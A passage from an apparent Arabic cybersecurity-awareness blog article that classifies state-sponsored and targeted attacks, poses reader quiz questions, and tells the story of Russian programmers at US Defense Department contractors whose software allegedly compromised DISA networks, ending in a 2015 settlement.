مثال آخر علي ال State Sponsored Attackers المجموعة الروسية الشهيرة بلقب APT28 والوحدة 8200 في الجيش الإسرائيلي التي قامت ببرمجة فيروس Stuxnet

وال PLA التابع للجيش الصيني وغيرهم.

Targeted Attack: كما هو موضح من إسمه, هو إختراق يستهدف شركة معينة لكنه لا يستهدف جهات حكومية مثل ال State Sponsored وغرض هذا الإختراق دائما هو سرقة البيانات من الشركات بهدف بيعها والربح منها أو إستخدامها فيما بعد لأغراض أخري مثل سرقة البطاقات الإئتمانية وأموال المستخدمين.

مثال علي ذلك إختراق أحد الشركات العاملة في مجال البورصة لسرقة أموال ال Bitcoin التي يتم تداولها من خلال هذه الشركة.

مثال آخر, إختراق أحد شركات الألعاب الشهيرة لسرقة الكود المصدري Source Code الخاص بها وبيعه لشركة اخري منافسه لها.

مثال ثالث, إختراق موقع تابع لبنك معين لسرقة بيانات من قاعدة بياناته ويتم إستخدامها فيما بعد للإحتيال علي مستخدمي هذا البنك لسرقة أموالهم.

q

والآن إليك عزيزي القارئ هذه الأسئله, برجاء الرد عليها بناء علي ما قرأته في هذا المقال:

1- المخترق X قام بإنتحال شخصية أحد موظفي الشركة Y وقام بإرسال ملف pdf يحتوي علي ثغرة تم الإعلان عنها مسبقا لكنه قام بتشفيرها من جميع برامج الحماية, من وجهة نظرك, هل هذه الثغرة يتم تصنيفها ك ZeroDay بما أنها عالية الخطورة وغير مكتشفة من أي برنامج حماية وتصيب تطبيق يستخدمه ملايين الأشخاص, نعم أو لا؟ وتحت أي تصنيف يقع هذا المخترق من بين التصنيفات التي تم ذكرها بالأعلي؟

2- المخترق X قام بإختراق الشركة Y وقام بزرع RootKit داخل سرفرات الشركة لكي يتمكن من التحكم الكامل بها لفترة طويلة دون أن يتم إكتشافه, تحت أي تصنيف يقع هذا النوع من الإختراق؟

3- مؤخرا حدث صدام ما بين تركيا وروسيا بسبب إسقاط تركيا لطائرة روسية, بعدها بأيام أعلنت تركيا عن أن أنظمتها البنكية Online Banking تحت هجوم عنيف من الهكرز واللذين تم تتبعهم لتجد تركيا أن مصدر الإختراقات قادم من روسيا, في رأيك, هل هذا State Sponsored Attack ام Targeted Attack ؟

كيف إستطاعت المخابرات الروسية إختراق وزارة الدفاع الأمريكية منذ عام 2008

DISA

Defense Information Systems AgencyDISA

أو ما يعرف ب وكالة نظم المعلومات التابعة لوزارة الدفاع الأمريكية, والتي تعمل بمثابة منظومة الإتصالات ونظم المعلومات الخاصة بوزارة الدفاع والتي تقوم بتجميع البيانات الهامة والحساسة من مصادر مختلفة لهدف واحد, هو توفير الدعم للقوة العسكرية الأمريكية في صورة متخذي القرار بدأ من الرئيس الأمريكي, مرورا بمستشاريه ووزير الدفاع حتي الجنود في ساحة المعركة.

لكي تقوم هذه الوكالة بعملها من تجميع هذا الكم الهائل من البيانات وتقديمة بشكل مناسب لكل الجهات السابق ذكرها, فإنهم بالطبع يحتاجون لمشاريع برمجية عملاقة لكي تقوم بتجميع البيانات بشكل أوتوماتيكي من كل المصادر المتاحة ثم تقوم عن طريق الذكاء الإصطناعي أو عن طريق برمجيات معدة مسبقا من إستخراج المعلومات المهمه وتقديمها للجهات المعنية السابق ذكرها,

بالطبع مشاريع بهذا الحجم ﻻ يمكن لوزارة الدفاع الأمريكية بكل مشغولياتها من توفير فرق متخصصة لبرمجة هذه المشاريع, لذلك يعتمد الجيش الأمريكي علي شركات خارجية متخصصة في برمجة مثل هذه الأنظمة وهذه الشركات تعمل فقط لصالحة وزارة الدفاع الأمريكية في برمجة أنظمة الإتصالات العسكرية.

أحد هذه الشركات والتي يملكها John C. Kingsley قامت في العام 2010 بتوظيف مبرمجين روسيين للعمل لديها في برمجة عدة برامج خاصة بوكالة نظم المعلومات التابعة لوزارة الدفاع الأمريكية,

وبالفعل تم صدور البرامج المطلوبة وتم تنصيبها داخل ما يسمي بالشبكات الآمنة والتي يفترض أنها تحتوي علي السرفرات(الخوادم) التي تحمل البيانات السرية التابعة للوكالة دون علمهم بما تحويه هذه البرمجيات من برمجيات خبيثة أخري ﻻ حصر لها, حتي أن Patrick Malone وصف الأمر ب اوكازيون الفيروسات Viruses occasion !!

وبهذه الطريقة إستطاع الروس الوصول إلي قلب وزارة الدفاع الأمريكية بكل ما تحويه أنظمتهم من أسرار وإتصالات علي مدار الساعة!

secret

عوده بالتاريخ إلي الوراء قليلا .. حيث العام 2008 …

قامت وزارة الدفاع الأمريكية بعرض مشروع تبلغ قيمته المادية 22 مليون دولار علي بعض الشركات التابعة لها كما سبق ذكره في بداية المقال ..

المشروع يتلخص في تأمين وإدارة الشبكات العسكرية التابعة لوكالة DISA بما يشمله ذلك من برمجيات إدارة إلكترونية .. مشاريع بهذه الحساسية والضخامة تتطلب مبرمجين بمهارات إستثنايئه …

الروس معروفين عالميا ببراعتهم البرمجية علي مختلف منصات ولغات البرمجة بل وبراعتهم في كل ما يتعلق بالتكونولوجيا وعلوم التشفير,

قام ثلاثة من المبرمجين الروس بتقديم سيرتهم الذاتية CV إلي أحد الشركات العاملة بهذا المشروع وطلبوا راتب يساوي ثلث ما يطلبه المبرمجين الأمريكيين في وظيفة كهذه, بالطبع ما تحويه سيرتهم الذاتية من مهارات إستثنائية وسابقة أعمال ﻻ مثيل لها بالإضافة إلي راتب ضئيل هو أمر مغري لصاحب هذه الشركة كي يقبلهم للعمل لديه .. وقد كان!

شهر يناير من العام 2011 …

حيث تم إكتشاف برمجيات خبيثة تعمل داخل الشبكات الحساسة التابعة للوكالة, تم التكتم علي الأمر حتي عمل الفحوصات اللازمة للشبكات والأجهزة العاملة بالوكالة .. كانت نتيجة البحث أن إختراق هذه الأنظمة تم عن طريق البرمجيات التي قامت ببرمجتها شركة NetCracker في ذلك المشروع من العام 2008 .. وشركات أخري ساهمت في هذا المشروع في أوقات لاحقه!

قامت الوكالة برفع قضية ضد كل الشركات التي ساهمت بالعمل في هذا المشروع وتم تقديم مدراء الشركات للمحاكمة ..

هذه القضية دامت في المحاكم الأمريكية طيلة أربع سنوات متواصلة إلي أن تم الحكم فيها في شهر نوفمبر من هذا العام 2015 ..

مجمل أحداث القضية كانت كالتالي:

1- Computer Sciences Corporation والمتورطة أيضا في هذه القضية بإستئجار مبرمجين روسيين للعمل لديها, تقاضت مبلغ وقدره واحد ونصف مليار دولار من وزارة الدفاع الأمريكية نظير المشاريع البرمجية التي تقدمها لوزارة الدفاع ووكالة ال !DISA

2- المبرمجين الروسيين اللذين عملوا لدي الشركات المتورطة في هذه القضية قد شاركوا في كتابة برامج دخلت حيز الخدمة في:

وكالة نظم المعلومات التابعة لوزارة الدفاع الأمريكية DISA, سلاح الطيران الأمريكي, General Services Administration إدارة الخدمات العامة.

3- علي مدار أربع سنوات من المحاكمة وتقديم الإدعاءات والأدلة ونفيها, لم يستطع محاموا الجهات المتضررة من إلحاق تهمة الخيانة أو التورط بالجاسوسية إلي أي من أصحاب الشركات المتورطة في هذة العملية, وتم الإتفاق علي التعويض! حيث ستقوم الشركات المتورطة بدفع مبالغ مالية للجهات المتضررة كتعويض عن الخسائر التي لحقت بشبكاتها والبنية التحتية التي تضررت من جراء تلك الإختراقات.

المصدر الأصلي.

جملة من الكاتب في نهاية المقال:

” ليس من العيب أو الخطر أن يتم إختراقك أو إختراق شبكاتك, فهذا يحدث طيلة الوقت لأقوي الشركات, لكن الخطر الأكبر, هو أن لا تكتشف أصلا أنه تم إختراقك!”